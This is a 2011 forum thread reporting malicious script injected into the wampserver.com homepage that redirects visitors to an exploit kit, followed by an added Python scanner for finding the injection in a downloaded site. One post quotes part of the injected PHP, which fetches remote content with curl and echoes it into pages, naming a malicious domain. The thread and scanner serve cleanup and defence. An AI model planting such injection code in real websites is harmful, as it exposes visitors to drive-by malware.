Injected malicious Javascript on wampserver.com
Posted by: positronJon (---.hsd1.md.comcast.net)
Date: October 21, 2011 03:45AM

There is injected malicious JavaScript on the main page of wampserver.com; it's redirecting to an exploit kit that exploits older versions of PDF and Java, which undoubtedly drops malware. It's at the very bottom of the main page.


Here is a short blog post outlining the injected code: [somethingsec.blogspot.com]

Re: Injected malicious Javascript on wampserver.com
Posted by: sTimulated (---.as13285.net)
Date: October 21, 2011 09:55AM

What does this mean to us users?
What needs to be clicked to get redirected?

Re: Injected malicious Javascript on wampserver.com
Posted by: positronJon (158.74.17.---)
Date: October 21, 2011 04:20PM

Nothing. It's an obfuscated iframe. It redirects you automatically (in the background) when you visit the page.

Re: Injected malicious Javascript on wampserver.com
Posted by: stevenmartin99 (---.b-ras1.srl.dublin.eircom.net)
Date: October 21, 2011 04:29PM

I've sent it on to the site owner - will be sorted soon.

Steven Martin
stevenmartin99@gmail.com
stevenmartin99@hotmail.com
PampServer.com - [pampserver.com]

Re: Injected malicious Javascript on wampserver.com
Posted by: sharp1001 (---.cust.bredband2.com)
Date: October 22, 2011 06:38AM

Hi...

After spending 18 hours, I have now found the solution for removing this malware from websites.

1. Download your whole website.
2. Manually find the malicious code given below and DELETE it from ALL of your web pages.


Malicious Code:
_______________________________________

<?php

if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&
----
-----
----
----
---------
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}

?>
________________________________________________

The above malicious code is generating that link (GET [m-e.crossfitharlem.net]...)


Enjoy & Good Luck :)
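
One way to do step 2 of the post above without opening every page by hand, as an added example that is not part of the original thread: a scanner that walks a downloaded copy of the site and reports which files contain the quoted injection and on which lines. The marker strings are copied from the code in the post; the function names, the two-marker threshold and the sample files are assumptions made for this example.

```python
import os
import tempfile

# Marker strings copied from the injected PHP quoted in the post above.
MARKERS = (
    "$sRetry",
    "$stCurlHandle",
    "This code use for global bot statistic",
    "Statistic code end",
)
MIN_HITS = 2  # assumption: require two distinct markers to limit false positives

def scan_file(path):
    """Return {marker: [line numbers]} for markers found in one file."""
    hits = {}
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, start=1):
            for marker in MARKERS:
                if marker in line:
                    hits.setdefault(marker, []).append(lineno)
    return hits

def scan_tree(root):
    """Walk a downloaded site copy; return [(path, first, last, markers)]."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if len(hits) >= MIN_HITS:
                lines = [n for nums in hits.values() for n in nums]
                findings.append((path, min(lines), max(lines), sorted(hits)))
    return sorted(findings)

def demo():
    """Build a constructed two-file site copy and scan it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<html>ok</html>\n<?php\nif (!isset($sRetry))\n{\n"
                     "// This code use for global bot statistic\n"
                     "$stCurlHandle = NULL;\n}\n?>\n")
        with open(os.path.join(root, "clean.php"), "w") as fh:
            fh.write("<?php echo 'hello'; ?>\n")
        return [(os.path.basename(p), a, b, m) for p, a, b, m in scan_tree(root)]

if __name__ == "__main__":
    for row in demo():
        print(row)
```

The scanner only reports; the reported line range is where to look when removing the block, and every file type is checked because the injection is not limited to `.php` files by anything in the thread.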
